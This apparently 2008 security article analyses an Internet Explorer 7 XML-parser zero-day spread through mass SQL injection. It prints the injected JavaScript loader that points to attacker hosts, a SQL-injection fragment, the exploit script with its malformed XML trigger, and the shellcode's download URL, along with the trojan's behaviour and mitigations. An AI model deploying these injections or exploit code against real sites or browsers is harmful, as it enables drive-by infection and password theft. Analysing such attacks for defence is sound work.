Cyberwarfare Magazine

Bits of information about the new 0-day exploit are surfacing on the web. This exploit provokes a heap overflow in the XML parser of Internet Explorer 7. The exploit works with the fully patched version of Windows XP, Windows Server 2008 and Windows Vista SP1[1].

The Infection

The exploit is initiated by a JavaScript file stored on infected servers across the web. The example given by the SANS Internet Storm Center is located at http://17gamo [dot] com/1.js. F-Secure also reported the http://www.nihaorr1.com/1.js URL as being infected. The content of the JavaScript file is injected through sites by a SQL injection attack and it contains a link to a web page containing the exploit and the shellcode. A complete list of infected websites can be found at Shadowserver.

The contents of the 1.js file (be careful of what you do with this info!):

document.writeln("<script src=\"http:\/\/count48.51yes.com\/click.aspx?id=484329676&logo=1\">
<\/script>");
document.write("<iframe width=100 height=0 src=http://www.17gamo.com/co/index.htm>
<\/iframe>");

The SQL injection works by adding a link to every text field contained in an accessible database. Therefore, once text contained in the database is retrieved to be displayed on the webpage, the malicious link to the JavaScript is also included in it and executes the contents of the file, which contains two statements.  One is a counter to measure how many victimes it made, the other is an iFrame to the malicious webpage. The SQL injection usually takes this form, but it really depends on which software is attacked:

rtrim(convert(varchar(4000),['+@C+']))+''<script src=http://17gamo [dot] com/1.js>
</script>''')FETCH NEXT FROM

The Exploit

This is part of the JavaScript found in the while. It checks the version of the browser and OS and triggers the buffer overflow:

sleep(6000);
</script>

nav = navigator.userAgent.toLowerCase();

if (navigator.appVersion.indexOf(‘MSIE’) != -1) {
    version = parseFloat(navigator.appVersion.split(‘MSIE’)[1])
}

if (version==7) {
w2k3 = ((nav.indexOf(‘windows nt 5.2’) != -1) || (nav.indexOf(‘windows 2003’) != -1));
wxp = ((nav.indexOf(‘windows nt 5.1’) != -1) || (nav.indexOf(‘windows xp’) != -1));

    if (wxp || w2k3)
document.write(‘<XML ID=I><X>    <C><![CDATA[<image 
SRC=http://&amp;#2570;&amp;#2570;.xxxxx.org    >]]></C></X>
</XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
</SPAN>’);

    var i=1;
    while (i <= 10 ) {
        window.status= “ ”; i++;
    }
}
</script>

You can get a working example at milw0rm.com.

The script used in the wild waits for 6 seconds before starting, apparently to fool anti-viruses. It then verifies if the current browser is Internet Explorer and if it’s version 7. It also checks that the OS is Windows XP or 2003 (but the exploit does work in Vista also). If all conditions are met, the script will then write the malformed XML code to exploit to the parser. The loop at the end keeps the status bar from displaying any information to the user. The parsing of the XML code will trigger a heap overflow in the parser and arbitrary code can be executed.

The vulnerability is explained more in detailed by the Chinese researchers[2] that first discovered the exploit and that released the code by mistake. The original article is written in Mandarin, but a rough translation from Google leads to a mistake in the handling of pointers when “SDHTML objects” are created. A machine translated post on a forum gave that information[3]:

Recently caught using IE7 0day vulnerability code, as in dealing with the object SDHTML errors lead to memory disorders, through the structural conditions of a specific code lead to cross-border memory. 现已有人赶制出网马生成器，相信会在短期内流行。 It was now working towards a network of horse generator, will be popular in the short term. 该漏洞存在于IE7的XML里，可以导致内存越界的漏洞，攻击者通过构造畸形XML代码并且使用JavaScript脚本操作ShellCode去执行任意代码。 The vulnerability exists in IE7’s XML, the memory can lead to cross-border loopholes, the attacker through the abnormal structure using JavaScript and XML code script ShellCode operation to execute arbitrary code.
漏洞描述： Description of the loopholes:
由于SDHTML里处理对象存在错误导致内存紊乱，通过构造某种条件可以使得SDHTML检测到错误释放已被分配的对象，但是在释放已被分配的对象后SDHTML并未返回而是继续使用被释放的对象的内存执行，如果这些内存又被分配给其他用途，将导致SDHTML把这些内存当作一个对象来操作。 SDHTML due to errors in handling the object lead to memory disorders, through some kind of structural conditions can make mistakes SDHTML detected the release of the allocation has been the target, but the release has been the target of the distribution did not return after SDHTML be released but continue to use the object The implementation of the memory, if memory has been allocated to other purposes, such SDHTML will lead to memory as an object to the operation. 攻击者使用了XML的SRC字符串对象占用了这些释放对象的空间，而对象指针里包含函数例程指针，最终导致代码执行。 An attacker using the XML string SRC release of these objects taking up space objects, and object pointer included in routine function pointer, leading to the implementation of the code.

This hole wasn’t patch with the latest update from Microsoft. No details are available on when a hotfix will be distributed. Disabling Active Scripting will prevent this exploit from downloading the Trojan. Doing so will also protect anyone from most of the online attacks (but it will also make some sites unusable). Other solution: use Firefox or Opera. And for the geekiest, you can always use the safest browser around by downloading it here.

Observed Payload

Right now, it seems these attacks using this exploit are limited to MMORPG password stealers. The shellcode included with the current exploit will download http://www [dot] steoo [dot] com/admin/win.exe[4]. F-secure detect the trojan contained in the file as Win32.Magania and as Infostealer.Gamania[5] by Symantec. This malware is a game password stealing Trojan for games created by the Taiwanese company Gamania, creator of Maple Story amongst others.

The trojan will create various files into the %SYSTEM% directory and add himself in the registry so that it boots every time the computer starts. Files created include[6]:

• %System%\Kerne0223.exe
• %System%\Kerne0223.dll
• %Windir%\SVCH0ST.EXE
• %System%\aer4532gxa.dll (detected as Infostealer.Lineage)
• [PATH TO TROJAN]\gg.bat
• %System%\drivers\etc\hosts
• c:\log.txt

And will steal every credentials entered by the user on these sites:

• [http://]club.pchome.com.tw
• [http://]gash.gamania.com/gash_loginform1.asp?Message=
• [http://]tw.gamania.com/default.asp?user_locate=
• [http://]tw.gamania.com/ghome/home_center.asp
• [http://]tw.gamania.com/ghome/home_login.asp?Message=
• [http://]tw.gamania.com/ghome/home_login.asp?user_locate=/ghome/home_center.asp
• [http://]tw.gashcard.gamania.com/
• [http://]www.gamania.com/ghome/home_center.asp
• [https://]gash.gamania.com/gashinclude/top.asp
• [https://]gash.gamania.com/gashindex.asp
• [https://]gash.gamania.com/joinwithgama/
• [https://]gash.gamania.com/openmainaccount/
• [https://]gash.gamania.com/queryaccount/
• [https://]tw.event.gamania.com/lineageevent/e20050502/index.asp
• [https://]tw.event.gamania.com/lineageevent/modify_warehouse_pwd/index.asp
• [https://]tw.gash.gamania.com/GASHLogin.aspx?
• [https://]tw.gash.gamania.com/UpdateMainAccountPassword.aspx
• [https://]tw.gash.gamania.com/UpdateServiceAccountPassword.aspx?
• [https://]tw.gash.gamania.com/accountctr/changeservicepwd.asp
• [https://]tw.gash.gamania.com/gashindex.asp
• [https://]tw.gash.gamania.com/index.aspx
• [https://]tw.gash.gamania.com/joinwithgama/
• [https://]tw.goodlock.gamania.com/ShowNew.aspx
• [https://]tw.goodlock.gamania.com/changeservicepwd.asp
• [https://]tw.goodlock.gamania.com/index.aspx

It is strongly believed that this Trojan origin is based in China. Various variants of this Trojan have been created. Variants may come with a keylogger and rootkits.

See also:

“Microsoft Security Advisory (961051)”, Microsoft, December 10, 2008, http://www.microsoft.com/technet/security/advisory/961051.mspx (accessed on December 11, 2008)

“Mass SQL Injection”, F-Secure, December 11, 2008, http://www.f-secure.com/weblog/archives/00001427.html (accessed on December 11, 2008)

“Chinese researchers inadvertently release IE7 exploit code”, John Leyden, The Register, December 11, 2008, http://www.theregister.co.uk/2008/12/11/ie7_exploit_leak/ (accessed on December 11, 2008)

---

[1] “0-day exploit for Internet Explorer in the wild”, Bojan Zdrnja, SANS Internet Storm Center, December 10, 2008, http://isc.sans.org/diary.html?storyid=5458 (accessed on December 11, 2008)

[2] “Alert: IE70DAY attack code has been linked to the use of  Trojan Horse”, December 12, 2008, http://www.scanw.com/blog/archives/303 (accessed on December 11, 2008 – Eastern Time GMT-5)

[3] Translated by Google Translate from Chinese, http://bbs.wopti.net/thread-80485-1-1.html (accessed on December 11, 2008)

[4] “0-day exploit for Internet Explorer in the wild”, Bojan Zdrnja, SANS Internet Storm Center, December 10, 2008, http://isc.sans.org/diary.html?storyid=5458 (accessed on December 11, 2008)

[5] “Infostealer.Gamania”, Hiroshi Shinotsuka, Symantec, February 13, 2007, http://www.symantec.com/security_response/writeup.jsp?docid=2006-111201-3853-99 (accessed on December 11, 2008)

[6] Ibid.